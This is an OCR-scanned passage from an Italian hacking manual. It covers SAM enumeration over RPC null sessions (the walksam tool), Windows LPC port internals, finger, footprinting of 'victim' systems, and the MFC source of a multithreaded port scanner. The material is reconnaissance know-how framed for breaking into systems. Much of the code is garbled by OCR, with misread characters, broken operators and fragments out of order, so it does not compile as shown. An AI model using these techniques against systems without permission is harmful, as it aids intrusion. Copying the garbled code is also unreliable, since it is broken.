UuidToString (&pVector->IfId[i]->Uuid, &str) ; 
printf (" %s v%d.%d\n", str ? str : "(nuli)", 

pVector->IfId[i]->VersMajor, 

pVector->IfId[i ] ->VersMinor) ; 

if (str) 

RpcStrlngFree (&str) ; 

} 

RpcIfldVectorFree (SpVector) ; 
return 0; 

} 
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vold 

Usage ( char *app) 
{ 

prlntf ("Usage: %s [optlons] -e <endpo±nt> <target>\n" , app) ; 
prlntf (" optlons : \n") ; 

prlntf (" -p protseq — use protocol sequence\n" , app); 
prlntf (" -e endpolnt — talk to endpoint\n", app); 
exit (1); 

} 



Int 

maln (Int argc, char *argv[l]) 
{ 

Int i; 

char *target = NULL; 

char *protseq = "ncacn_lp_tcp" ; 

char *endpolnt = NULL; 

for (1=1; l<argc; 1++) { 

If (argv[l][0] == '-') { 
swltch (argv[l] [1] ) { 

case 'v' : 

verboslty++; 
break; 

case 'p ' : 

protseq = argv[++l] ; 
break; 

case 'e': 

endpolnt = argv[++l ] ; 
break; 

de fault: 

fprintf (stderr, "Unknown optlon: %s\n", argv[i]); 

exit (1); 

break; 

} 

} else { 

target = argv[i]; 

} 

} 

If (/target II ! endpolnt) { 
Usage (argv[0]); 

} 

do_lflds (target, protseq, endpolnt) ; 
return 0; 



Se viene specificata una sequenza di protocollo alternativa, walksam cerca in ogni caso di 

usare una nuli session. 

Esempi: 

[c:\rpctools] walksam 192.168.1.1 
Scorre il SAM file usando Named Pipes. 



Scorre il file SAM usando TCP e la porta 1028. 
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Per determinare la porta dovete usare 

e guardare la voce che contiene l'interfaccia SAMR UUID, 1 2345778-1 234-abcd-efOO- 
0123456789ac. 

[c:\rpctools] walksam -p ncacn_http -e 1029 192.168.1 .1 



Scorre SAM usando MS come proxy. 

Esistono degli interprocessi di comunicazione client/server non documentate che sono 

utilizzate da componenti Windows NT. 

Queste vengono chiamate con il termine di LPC PORT. 

Il metodo fondamentale utilizzato per la comunicazione con le porte è mediante il passaggio 
di messaggi tra il client e il server. 
Questi messaggi hanno la forma di : 

typedef struct lpc_iasg { 

unslgned short data_len; 

unsigned short msg_len; /* normally data_len + sizeof (struct 
lpc_msg) 
*/ 

unsigned short msg_type; 

unsigned short address_range_offset; 

unsigned long pid; /* process id of client */ 

unsigned long tid; /* thread id of client */ 

unsigned long mid; /* message id for this message */ 

unsigned long callback_id; /* callhack id for this message */ 
/* unsigned char buff[0]; data_len bytes of data for this message */ 
} LPC_MSG; 

Un uso comune è il seguente: 

Server () 
{ 

HANDLE hPort; 

NtCreatePort (&hPort, "MyPort"); 
while (1) { 

NtReplyWaitReceivePort (hPort, NULL, msg_receive) ; 
if (msg_receive->type == connection_request) { 

NtAcceptConnectPort () ; 

NtCompleteConnectPort () ; 
} else { 

NtReplyPort (hPort) ; 

} 

} 

ì 



Client () 
{ 

HANDLE hPort; 

NtConnectPort (ShPort, "MyPort"); 
while (1) { 

NtRequestWaitReplyPort (hPort, msg_in, msg_out) ; 

} 

} 

Esistono diversi problemi di sicurezza connessi all'utilizzo di queste porte. 

La cosa interessante legata all'uso di queste porte è che sebbene il server riceva un nuovo 

handle da NtAcceptConnectPort per ogni client connesso, questo usualmente non utilizza 
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questo handle quando comunica con il client, ma al contrario usa un handle ottenuto tramite 
una cali a NtCreatePort. 

Cosa fa il kernel per conoscere a quale client la replica è indirizzata ? 
Esso usa il PID, TID e MID dal messaggio. 

Un utility prelevabile sempre da RAZOR si chiama PORTOOL e serve a ricavare questi 
parametri. 

Sempre nell'ambito dell'acquisizione di informazioni legate ad un sistema esiste la funzione 
finger la quale è legata appunto al protocollo FINGER. 

L'uso di finger riporta lo username di un travet comprese altre informazioni come ad esempio 
la data dell'ultimo login, la directory home e molte altre. 
La sintassi di finger è : 



finger user@host 

Se il comando è indirizzato al localhost è sufficiente dare finger user. 

Purtroppo per gli amministratori di sistema finger restituisce anche informazioni legate a utenti 
e directory speciali, che in genere non si vorrebbero comunicare ad utenti esterni al sistema. 
Molte volte il protocollo è disabilitato. 

I programmi visti fino ad ora sono in grado di svolgere determinate funzioni in modo 
completamente indipendente una dall'altra. 

In altre parole alcune Utilities sono in grado di enumerare gli host dentro ad un dominio, altre 
invece mostrano gli utenti connessi ad un host e cosi via. 

Server Administrator invece riesce a listare gli host di un certo dominio e in relazione ad ogni 
singolo host permette di vedere gli utenti, le risorse condivise, lo stato della replicazione. 
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Esistono una serie di Utilities che dispongono di numerosissime funzioni al loro interno. 
Abbiamo visto che esistono utility che eseguono le funzionalità di NSLOOKUP, altre che 
eseguono il finger, altre ancora che eseguono l'enumerazione delle connessioni TCP e cosi 
via. 

Alcuni pacchetti dispongono di tutto al loro interno. 

Uno di questi pacchetti è ADVANCED ADMINISTRATOR TOOLS il quale è di tipo shareware 

ed è prelevabile in formato dimostrativo, funzionante per circa 30 giorni, dalla rete. 

Un altro pacchetto con un numero elevatissimo di funzioni al suo interno è NETSCAN TOOLS 

4.22. 
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Le funzioni eseguite sono molte a partire dal TRACROUTE per arrivare al FINGER, WHOIS 
ecc. 



Footprinting 

Questo termine è quello utilizzato per descrivere il processo completo indirizzato alla 
creazione di un quadro completo legato allo schema di sicurezza di un determinato obbiettivo. 
Le operazioni da condurre sono molte in quanto possiedono come obbiettivo quello di riuscire 
ad individuare ogni singola caratteristica del sistema a partire dal tipo per giungere al sistema 
operativo e ai vari software che girano su questi. 

Come abbiamo già detto prima alcune volte l'hacking si basa sul fatto di saper sfruttare bugs 
e caratteristiche dei vari software di gestione dei servers. 

Le attività di raccolta delle informazioni sono il primo passo da fare e questo significa saper 
utilizzare un certo numero di programmi reperibili sulla rete indirizzati a identificare ogni 
singola caratteristica del sistema. 

Supponiamo di riuscire ad individuare che su un determinato sistema ci gira Windows 2000 
Server. 

Un'altra serie di informazioni importantissime ad esempio saranno quelle che ci mostrearanno 
quali patchs e hotfix sono state installate su questo. 
Stessa cosa dicasi per i vari software quali ad esempio MS. 

Molte modalità di accesso ai sistemi si basano, ad esempio, sui bugs presenti nella versione 
.0 di questo server. 

Prima di cercare di adottare determinate soluzioni sarà quindi necessario identificare se la 
versione di fatto è quella che ci stiamo aspettando. 

In questo capitolo cercheremo di fare una panoramica su quelle che sono le informazioni utili 
e quali sono i mezzi per riuscire ad ottenerle. 

La prima attività è sicuramente quella che riesce ad individuare determinati IP con delle porte 
aperte. 

I vari servers possono avere in funzione determinati servizi come ad esempio quello relativo a 
http. 

Nella tabella legata alla descrizione delle porte abbiamo visto quali sono quelle più frequenti 
come ad esempio quella 80 legata al servizio http ovvero quella del WEB Server. 
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Se il sistema mantiene in funzione servers quali ad esempio il MAIL SERVER o un server 
FTP troveremo attive anche altre porte come ad esempio la 1 10. 

La prima fase di ricerca di queste infrmazioni pretende l'utilizzo di quelli definiti con il termine 
di PORT SCANNER i quali fornitogli un determinato range di IP li analizzano ed indicano 
quali porte sono aperte su questi. 

Di scanner ne esistono di moltissimi tipi anche se certi dispongono di funzioni molto avanzate 
come ad esempio NMAP in ambiente Unix o NMAPNT per quello Windows. 
In ogni caso NMAP non è molto indicato come scanner per una prima identificazione di 
eventuali IP adatti. 

Altri pacchetti quali ad esempio ADVANCED ADMINISTRATOR TOOLS possiedono 
caratteristiche ottime per tale funzione. 

Per adesso lasciamo perdere quei software che dispongono di funzioni molto più dettagliate 
nell'ambito delle analisi fatte solo che queste vengono indirizzate ad un singolo IP. 
Infatti software come RETINA riescono a provare sulle porte aperte anche un numero molto 
grande di tentativi da hacker ma soltanto che usando questo sarebbe impossibile individuare 
direttamente i sistemi in quanto sarebbe necessario conoscere già in partenza l'IP su cui fare 
il test. 

Detto in altre parole per questa prima fase della ricerca ci servono SCANNER veloci il cui 
scopo sia solo quello di testare su un range di IP la presenza delle porte aperte. 
Spesso le persone mantengono idee errate nei confronti di quella che è l'attoività dell'hacker. 
In molti casi esiste la convinzione che alcuni hacker posseggano una bacchetta magica 
adatta a fare penetrare un individuo in tutti i sistemi. 

Questa bacchetta magica di fatto è la capacità di farsi un quadro completo e chiaro del 
sistema o dei sistemi vittima sui quali si cerca di operare. 

In alcuni casi entrare buin un sistema è una cosa particolarmente semplice soppratutto 
quando il sustem admin non segue alcune regole di base relative alla manutenzione dei 
propri sistemi. 

Altri casi pretendono la ricerca di informazioni che vanno oltre a quelle che sono relative ad 
un computer soltanto. 

Supponiamo che il sistema X, a seguito di un analisi dettagliata, non possegga di fatto dei 
bugs utilizzabili per scrivere informazioni o per attivare comandi su questo per cui a questo 
punto l'interesse si sposta verso quelle che sono le informazioni generali di tutto il dominio a 
cui appartiene il sistema. 

La raccolta di tali informazioni potrebbero portare ad identificare il metodo per riuscire a 
sostituirsi a qualche host certificato all'interno del dominio stesso. 

Nel presente capitolo vedremo alcune metodologie trattandole anche dal punto di vista del 
software anche se alcune Utilities, come quelle di RHIN09, vengono trattate a parte. 



1 1 test di presenza di un host 

Al fine di testare soltanto la presenza di qualche IP potremmo anche utilizzare quelli definiti 
con il termine di PING SWEEPER come ad esempio Pinger di RHIN09 distribuito come 
freeware sulla rete. 

Per fare questo potremmo anche scriverci un software 

Vediamo di progettarci un PORTSCAN che ci possa servire in questa prima fase. 

Il programma permette di testare direttamente degli IP utilizzando più THREAD oppure 

sempre con questo è possibile analizzare una determinata porta. 

Le funzioni di gestione della rete vengono eseguite tramite una classe che viene creata 
derivata da quella SOCKADDRJN. 

Carichiamo Visual Studio e creiamo un progetto vuoto MFC basato sulla dialog. 
La dialog mostrata nell'immagine è definita dentro al file di risorse .RC 
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//Microsoft Developer Studio generateci resource script. 

// 

iinclude "resource. h" 

idefine APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated front the TEXTINCLUDE 2 resource. 

// 

iinclude "afxres.h" 

///////////////////////////////////////////////////////////////////////////// 
iundef APSTUDIO_READONLY__SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// English (U.S.) resources 

#if ! defined (AFX_RESOURCEDLL ) // defined (AFX_ TARG_ENU) 
Hfdef _WIN32 

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 
ipragma code __page (1252) 
iendif //_WIN32 

Hfdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource. h\0" 

END 

2 TEXTINCLUDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCLUDE DISCARDABLE 
BEGIN 

"idefine _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO__OLE_RESOURCES\r\n " 
"idefine _AFX_NO__TRACKER_RESOURCES\r\n " 
"idefine _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"Hf ! defined (AFX_RESOURCE_DLL) Il defined (AFX_TARG_ENU)\r\n" 

"Hfdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"ipragma code_page (1252)\r\n" 

"tendi f //_WIN32\r\n" 
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"^include ""afxres.ro"" // Standard components\r\n" 

"#endif\r\n" 

"\0" 

END 

#endif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID valile placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "resWportscan . ico" 

///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog 

// 



IDD_PORTSCAN_DIALOG DIALOGEX 0, 0, 355, 241 

STYLE DS_MODALFRAME / WS_POPUP / WS_VISIBLE / WS_CAPTION 

EXSTYLE WS_EX_APPWINDOW 

CAPTION "Port Scanner" 

FONT 8, "MS Sans Serif" 

BEGIN 

"Scan SPorts" , IDC_PORT, "Button" , BS^AUTORADIOBUTTON / 
WS_GROUP I WS_TABSTOP,275,20,53,13 
"Scan SIP ' s ", IDC_IP, "Button ", BS_AUTORADIOBUTTON / 
WS_TABSTOP, 215, 20, 50, 13 
"IP /Port : ", IDC_STATIC, 15, 22, 32, 10 
IDC_IP_PORT, 60, 20, 145, 12, ES_AUTOHSCROLL 

IDC_LIST,10,55,258,174,LBS_SORT / LBS_NOINTEGRALHEIGHT / 
WS_VSCROLL I WS_TABSTOP 
"&SCAN", IDOK, 295, 205, 50, 20 
"Cancel Scan ", IDCANCEL, 295, 150, 50, 20 

IDC_ THREAD_ COUNT, 295, 180, 50, 113, CBS_DROPDO«NLIST / 
WS_VSCROLL I WS_TABSTOP 
"Sa&ve Output ", IDC_SAVE, 295, 125, 50, 19 
" ", IDC_STATIC, 0, 0, 355, 45, 0, WS_EX_DLGMODALFRAME 
" ", IDC_STATIC, 0, 45, 280, 195, 0, WS_EX_DLGMODALFRAME 
"", IDC^STATIC, 280, 45, 75, 195, 0, WS_EX_DLGMODALFRAME 
END 



CONTROL 

CONTROL 

RTEXT 

EDITTEXT 

LISTBOX 

DEFPUSHBUTTON 

PUSHBVTTON 

COMBOBOX 

PUSHBVTTON 
GROUPBOX 
GROUPBOX 
GROUPBOX 



iifndef _MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Ver sion 

// 

VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK Ox3fL 
Hfdef _DEBUG 

FILEFLAGS Oxl L 
#else 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FILESUBTYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo " 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VALUE "CompanyName" , "\0" 

VALUE "FileDescription" , "portscan MFC Application\0" 

VALUE "FileVersion", "1, 0, 0, 1\0" 

VALUE "InternalName", "portscan\0" 

VALUE "LegalCopyright", "Copyright (C) 1998\0" 

VALUE "LegalTrademarks" , "\0" 

VALUE "OriginalFilename", "portscan . EXE\0 " 
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VALUE "ProductName", "portscan Application\0" 
VALUE "ProductVersion", "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE " Trans lat ion" , 0x409, 1200 

END 

END 

#endif // .'_A£ftC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

gifdef APSTUDIO_INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD_PORTSCAN_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 2 

RIGHTMARGIN, 353 

TOPMARGIN, 2 

BOTTOMMARGIN, 239 

END 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog Info 

// 

IDD_PORTSCAN_DIALOG DLGINIT 
BEGIN 

IDC_ THREAD__ COUNT, 0x403, 11, 0 
0x2031, 0x5328, 0x6e69, 0x6c67, 0x2965, 

IDC_THREAD_COUNT, 0x403, 10, 0 
0x2032, 0x6854, 0x6572, 0x6461, 0x0013, 

IDC_THREAD_COUNT, 0x403, 10, 0 
0x2034, 0x6854, 0x6512, 0x6461, 0x0013, 

IDC_THREAD_COUNT, 0x403, 10, 0 
0x2038, 0x6854, 0x6512, 0x6461, 0x0013, 

IDC_THREAD_COUNT, 0x403, 11, 0 
0x3631, 0x5420, 0x1268, 0x6165, 0x1364, 

IDC_ THREAD_ COUNT, 0x403, 11, 0 
0x3233, 0x5420, 0x1268, 0x6165, 0x1364, 

IDC_THREAD_COUNT, 0x403, 11, 0 
0x3436, 0x5420, 0x1268, 0x6165, 0x1364, 

IDC_ THREAD_ COUNT, 0x403, 12, 0 
0x3231, 0x2038, 0x6854, 0x6512, 0x6461, 

IDC_THREAD_COUNT, 0x403, 12, 0 
0x3532, 0x2036, 0x6854, 0x6512, 0x6461, 

IDC_THREAD_COUNT, 0x403, 12, 0 
0x3135, 0x2032, 0x6854, 0x6512, 0x6461, 

IDC_THREAD_COUNT, 0x403, 13, 0 
0x3031, 0x3432, 0x5420, 0x1268, 0x6165, 

0 

END 



///////////////////////////////////////////////////////////////////////////// 
// 

// String Table 

// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDP_SOCKETS_INIT_FAILED "Windows sockets initialization failed. " 

END 

iendif // English (U.S.) resources 



"\000" 



"\000" 

"\000" 

"\000" 

0x0013, 

0x0013, 

0x0013, 

0x1364, "\000' 
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Hfndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generateci front the TEXTINCLUDE 3 resource. 

// 

idefine _AFX__NO_SPLITTER_RESOURCES 
idefine _AFX_NO_OLE_RESOURCES 
idefine _AFX_NO_TRACKER_RESOURCES 
idefine _AFX_NO_PROPERTY_RESOURCES 

Hf ! defined (AFX__RESOURCE_DLL) Il defined (AFX_ TARG_ENU) 

Hfdef _WIN32 

LANGUAGE 9, 1 

ipragma code _page (1252) 

iendif //_WIN32 

iinclude "res\portscan . rc2 " // non-Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 



Le funzioni di gestione della rete sono incapsulati dentro alla classe CinetAddress. 

Hf ! defined (AFX_INETADDRESS_H 3D4CE3A4 649E 11D2 A3F7 004033901FF3 INCLUDED ) 

idefine AFX_INETADDRESS_H 3D4CE3A4_ 649E_11D2_A3F7_004033901FF3 INCLUDED_ 

Hf _MSC_VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 



///////////////////////////////////////////////////////////////////////////// 
// CinetAddress 

// use array operator for multiple aliases - or cast to 'SOCADDR_IN' directly 
// constructor takes generic inet address and optional default port # 

class CinetAddress : public CObject, public SOCKADDR_IN 
{ 

public: 

DECLARE_DYNAMIC (CinetAddress ) ; 

CinetAddress (LPCSTR szAddr, UINT uiDefPort=0) ; // server : port 
virtual ~CInetAddress () ; 

BOOL IsValid () // indicates no error in constructor 

{ return (m_bIsValid) ; ) 

CString Get Address () // as specified in constructor with port 

{ return (m__csAddr) ; } 

CString GetName () 

{ return (m_csName) ; } 

CString GetAlias () // obtained by ' gethostbyaddr ' 

{ return (m_csAlias) ; ) 

int GetDimensions ( ) 

{ return (1 + m_aAlternates . GetSize ( ) ) ; } 
SOCKADDR_ IN operator [] (int ilndex) ; 

static BOOL IsAddress (LPCSTR szAddr) ; // TRUE if i.i.i.i; false otherwise 
static BOOL GetAddress (LPCSTR szAddr, char cAddr [4] ) ; 

static BOOL IsAddressRange (LPCSTR szAddr); // TRUE if i.i.i.i with asterisks 
static BOOL GetAddressRange (LPCSTR szAddr, int cAddr[4]); 

protected: 

CArray<SOCKADDR_IN, SOCKADDRIN &> m_aAlternates ; 
BOOL m__bIsValid; 
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CString m__csAddr; 

CString m_csName; // officiai name (from HOSTENT) 
CString m_csAlias; // lst alias (from HOSTENT) 

}; 



iendif // AFX_INETADDRESS_H_3D4CE3A4_649E_11D2_A3F7_004033901FF3_INCLUDED_ 

Il file .cpp è invece il seguente : 

iinclude "stdafx.h" 
iinclude "portscan.h" 
iinclude "InetAddress . h" 

iifdef _DEBUG 
idefine new DEBUG_NEW 
gundef THIS__FILE 

static char THIS_FILE[] = FILE ; 

iendif 

///////////////////////////////////////////////////////////////////////////// 
// CInetAddress 

IMPLEMENT DYNAMIC (CInetAddress, CObject) ; 

CInetAddress : : CInetAddress (LPCSTR szAddr, UINT uiDefPort /* = 0 */) 
{ 

m_csAddr = szAddr; 

m_csAddr . TrimRight () ; 
m_csAddr . TrimLeft () ; 

sin_family = AF_INET; // required 
sin_port = 0; 

memset ( & sin_addr , 0, sizeof (sin_addr) ) ; 
memset (&sin_zero, 0, sizeof (sin_zero) ) ; 

m_bIsValid = FALSE; 

int il; 

il = m_csAddr.Find( ' : '); // the only ' : ' should be for a port 

CString csAddr = m csAddr; 

if(il >= 0) 
{ 

sin_port = atoi (csAddr .Mid (il + 1) ) ; 

if(! sin_port ) 

sin_port = uiDefPort ; 

csAddr = csAddr .Le ft (il) ; 
csAddr . TrimRight () ; 

) 

else 
{ 

sin_port = uiDefPort ; 

) 

sin_port = htons (sin _port) ; // ensure byte order is reversed 

if(! csAddr) 
{ 

/ / assume current machine - get machine 's de fault host name 

gethostname (csAddr. GetBufferSetLength (MAX_PATH) , MAX_PATH) ; 
csAddr . ReleaseBuffer (-1) ; 

m_csAddr . Format ( "%s : %d", (LPCSTR) csAddr, (UINT) htons (sin_port) ) ; 

} 



HOSTENT *pH = NULL; 



// pre-load with zero 

// pre-load with zeros, first 

// zero out unused portion 
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// is address a #.#.#.# or a name? 

BOOL blsAddress = IsAddress (csAddr) ; // alphanumeric? 

if (! blsAddress) 
{ 

pH = gethostbyname (csAddr) ; 

} 

else 
{ 

char cAddr[4] = {0, 0,0,0); 

if (Get Address (csAddr, cAddr) ) 
{ 

sin_addr.S_un.S_un_b.s_bl = cAddr [0] ; 
sin_addr.S_un.S_un_b.s_b2 = cAddr[l]; 
sin_addr.S_un.S_un_b.s_b3 = cAddr [2] ; 
sin_addr.S_un.S_un_b.s_b4 = cAddr [3] ; 

pH = gethostbyaddr (cAddr, sizeof (cAddr) , PF_INET) ; 

if(tpH) // special case - specified an address... 
{ 

if ( : -.MessageBox (NULL, csAddr + " - address does not resolve - use it anyway?", 
"* PORTSCAN - WARNING *", 

MB_SETFOREGROUND / MB_ YESNO / MB_ ICONASTERISK) 

== IDYES) 

{ 

m_bIsValid = TRUE; // if I get here, it worked ok 

m_csAddr .Format ("%s : %d" , (LPCSTR) csAddr , htons (sin_port) ) ; // just keep 



TRIS 



} 



} 

return; 



fdpH) 

return; // no further processing (error) 

f (pH->h_name) // keep copy of name/port I connected to 
m_csAddr . Format ("%s: %d", (LPCSTR) pH->h_name, (UINT) htons (sin_port) ) , 

/ / if there 's an alias, put the first one in m_csAlias 

if (pH—>h_aliases SS pH—>h_aliases [0] ) 
m csAlias = pH—>h aliases [0] ; 

ASSERT (pH—>h_addrtype == PF_INET) ; 
ASSERT (pH->h_length == 4); 

if(!pH->h_addr_list II !pH->h_addr_list [0] ) 
{ 

return; // no further processing (error) 

) 

if (blsAddress) 
{ 

SOCKADDR_ IN sa; 
memset(Ssa, 0, sizeof (sa)); 

sa . sinfamily = sin_family; 
sa . sin port = sin port ; 

if (pH->h_length >= 1) 

sa . sin_addr . S_un . S_un b . s_bl = pH—>h_addr_list [il] [0] ; 
if (pH->h_length >= 2) 

sa . sin_addr . S_un . S un b . s_b2 = pH->h_addr_list [il] [1] ; 
if (pH->h_length >= 3) 

sa . sin_addr . S_un . S un_b . s_b3 = pH—>h_addr_list [il] [2] ; 
if (pH->h_length >= 4) 
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sin_addr . S_un . S_addr) // do they match? 
if NOT, make this one the lst alternate 



pH->h_addr_list [0] [0] ; 
pH->h_addr_list [0] [1] ; 
pH->h_addr_l±st [0] [2] ; 
pH->h_addr_list [0] [3] ; 



// now, as long as there are alternates , add them to the ' m_aAlternates ' array 

f or (11=1; pH->h_addr_list [il] ; 11++) 
{ 

SOCKADDR_ IN sa; 

memset (Ssa, 0, sizeof (sa) ) ; 

sa . sin_family = sin_family; 
sa . sin_port = sin_port ; 

if (pH->h_length >= 1) 

sa . sin__addr . S__un . S_un_b . s_bl = pH->h_addr_list [il] [0] ; 
if (pH->h_length >= 2) 

sa . sin_addr . S_un . S un_b . s i>2 = pH->h addr_list [il] [1] ; 
if (pH->h_length >= 3) 

sa . sin_addr . S_un . S_un_b . s_b3 = pB->h_addr_list [il] [2] ; 
if (pH->h_length >= 4) 

sa . sin_addr . S_un . S_un_b . s_b4 = pH->h_addr_list [il] [3] ; 

if (sa . sin_addr . S_un. S_addr != sin_addr . S_un . S_addr) // do they match? 

m_aAlternates .Add (sa) ; // it not, go ahead and add it (make sure I don't 
duplicate) 
} 

m_bIsValid = TRUE; // if I get here, it worked ok 

} 

CInetAddress : : ~CInetAddress () 

{ 

) 

SOCKADDR_IN CInetAddress : : operator [] (int ilndex) 
{ 

if ( ! ilndex) 
{ 

return ( ( SOCKADDR_ IN) *this) ; 

) 

if (ilndex < 0 II ilndex > maAlternates . GetSize () ) 
{ 

SOCKADDR_ IN sa; 

memset (Ssa, 0, sizeof (sa)); 

return (sa) ; 

} 

return (m^aAlternates [ilndex - 1]) ; 

) 



// static member "helper" utility functions 

BOOL CInetAddress: : IsAddress (LPCSTR szAddr) // TRUE if §.§.§.§; false otherwise 
{ 

// is address a #.#.#.# or a name? 
CSt ring csAddr = szAddr; 
int il; 

for(il=0; il < csAddr.GetLength() ; il++) 



if (sa . sin_addr . S__un. S_addr ! = 
m_aAlternates .Add (sa) ; // 

} 

else 
{ 

if (pH->h_length >= 1) 

sin_addr.S_un.S_un_b.s_bl = 
if (pH->h_length >= 2) 

sinaddr.S un.S un b.s b2 = 
if (pH->h_length >= 3) 

sin_addr.S_un.S_un_b.s_b3 = 
if (pH->h_length >= 4) 

sin_addr.S_un.S_un_b.sb4 = 

) 
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if((csAddr[il] < '0' Il csAddrfil] > '9') SS 
csAddr[±l] != • . ') 
break; 

} 

return (il >= csAddr . GetLength () ) ; 

ì 

BOOL CInetAddress : :GetAddress (LPCSTR szAddr, char cAddr[4]) 
{ 

LPCSTR lpl = szAddr; 
unsigned long aL[4]; 

cAddr[0] = cAddr[l] = cAddr[2] = cAddr[3] = 0; 
aL[0] = aL[l] = aL[2] = aL[3] = 0; 

int il; 

for(il=0; il < 4; il++) 
{ 

while(*lpl SS *lpl != '. ') 
{ 

while(*lpl <= ' ') 
lpl++; 

if(*lpl < '0' Il *lpl > '9') // not likely 
break; 

aL[il] *= 10L; 

aL[il] += (BYTE) (* lpl - '0'); 
lpl++; 

} 

if(!*lpl II *lpl != ' . ') 
break; 

lpl++; // go past the ' . ' 

} 

if(!*lpl) // this means ' good result' 
{ 

// assume any remaining items are zeros and assign them as sudi, 
// unless the address was entered as a non-standard long integer 
// or "less than 3 dot " address . 

if(il < 1) 

aL[l] = aL[0] S Oxffffff; 
aL[0] = (aL[0] » 24) S Oxff; 

if(il < 2) 

aL[2] = aL[l] S Oxffff; 
aL[l] = (aL[l] » 16) S Oxff; 

if(il < 3) 

aL[3] = aL[2] S Oxff; 

aL[2] = (aL[2] » 8) S Oxff; 



for(il=0; il < 4; il++) 

cAddrfil] = (unsigned char) (aL [il] S Oxff); 

} 

return (il >= 4); 

} 

BOOL CInetAddress : : IsAddressRange (LPCSTR szAddr) // TRUE if #.#.#.# with '*' 
{ 

// is address a #.#.#.# or a name? 

CSt ring csAddr = szAddr; 
BOOL bAssToRisk = FALSE; 
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int il; 

for(il=0; il < csAddr. GetLength () ; il++) 
{ 

if((csAddr[il] < '0' Il csAddr[il] > '9') SS 
csAddr[il] != ' . ') 

{ 

if(csAddr[il] == '*' SS // if it's an asterisk. . . 

(il ==011 csAddr [il - 1] =='.') SS // previous and next are/were 
((il + 1) >= csAddr . GetLength ( ) Il csAddr[il + 1] == '. ')) 

l 

bAssToRisk = TRUE; 

} 

else 
{ 

break; 

} 

} 

} 

return (bAssToRisk SS il >= csAddr . GetLength ()) ; 



BOOL CInetAddress : : GetAddressRange (LPCSTR szAddr, int cAddr[4]) 
{ 

LPCSTR lpl = szAddr; 

cAddr[0] = cAddrfl] = cAddr[2] = cAddr[3] = 0; 
int il; 

for(il=0; il < 4; il++) 
{ 

while(*lpl SS *lpl != '. ') 
{ 

while(*lpl <= • •) 
lpl++; 

if(*lpl == '*') 
{ 

cAddr[il] = -1; 
lpl++; 

break; 

} 

else if(*lpl < '0' Il *lpl > '9') // not likely 
{ 

break; 

} 

cAddr[il] *= 10; 

cAddrfil] += (BYTE) (* lpl - '0'); 
lpl++; 

} 

if(*lpl SS *lpl != ' . ') 
{ 

break; // not likely 

} 

else if(!*lpl) 
{ 

// assume remaining items are zeros and assign them as such 

while (il < 3) 

cAddr[++il] = 0; 

} 

else 
( 

lpl++; // go past the ' . ' 

} 



return (il >= 4); 



La dialog in cui vengono inseriti i dati viene gestita dalla serie di funzioni definite dentro alla 
classe CportscanDIg. 
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I files sono i seguenti : 

#if .' defined (AFX_PORTSCANDLG_H 8784EA58_ 6A1 8 11D2 A3FA 004033901FF3 INCLUDED ) 

gdefine AFX_PORTSCANDLG__H 8784EA58_6A18_11D2_A3FA_004033901FF3_INCLUDED_ 

#if _MSC_VER > 1000 
ipragma once 

iendif // __MSC_VER > 1000 

///////////////////////////////////////////////////////////////////////////// 
// CPortscanDlg dialog 

class CPortscanDlg : public CDialog 
{ 

// Construction 
public: 

CPortscanDlg (CWnd* pParent = NULL) ; // standard constructor 
static CMutex m Mutex; // for synchronization 

static CArray<CWinThread *, CWinThread *> m aThreads ; // current array of threads 

static void AddThread (CWinThread *) ; 
static void EndThread (CWinThread *) ; 

CFont mJFont; 

// Dialog Data 

//{ {AFX_DATA (CPortscanDlg) 

enum { IDD = IDD_PORTSCAN_DIALOG }; 

CComboBox m_wndThreadCount ; 

CButton mbtnExit ; 

CButton m btnScan ; 

CButton m_btnHelp; 

CButton m_btnCancel ; 

CButton m btnSave; 

CListBox m_wndList; 

CStringm_csIPPort ; 

int miType; 

CString m_csStatus ; 

int miThreadCount ; 

//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

/ 7 { {AFX_VIRTUAL (CPortscanDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

HICON m_hIcon; 

// Generated message map functions 

//{ {AFX^MSG (CPortscanDlg) 

virtual BOOL OnlnitDialog () ; 

afx_msg void OnPaintf); 

afx_msg HCURSOR OnQueryDraglcon ( ) ; 

afx_msg void OnHelp () ; 

afx_msg void OnSaveO; 

virtual void OnOK() ; 

virtual void OnCancelf); 

afx_msg void OnExit () ; 

afx_msg BOOL OnSetCursor (CWnd* pWnd, UINT nHitTest, UINT message) ; 
//} }AFX_MSG 

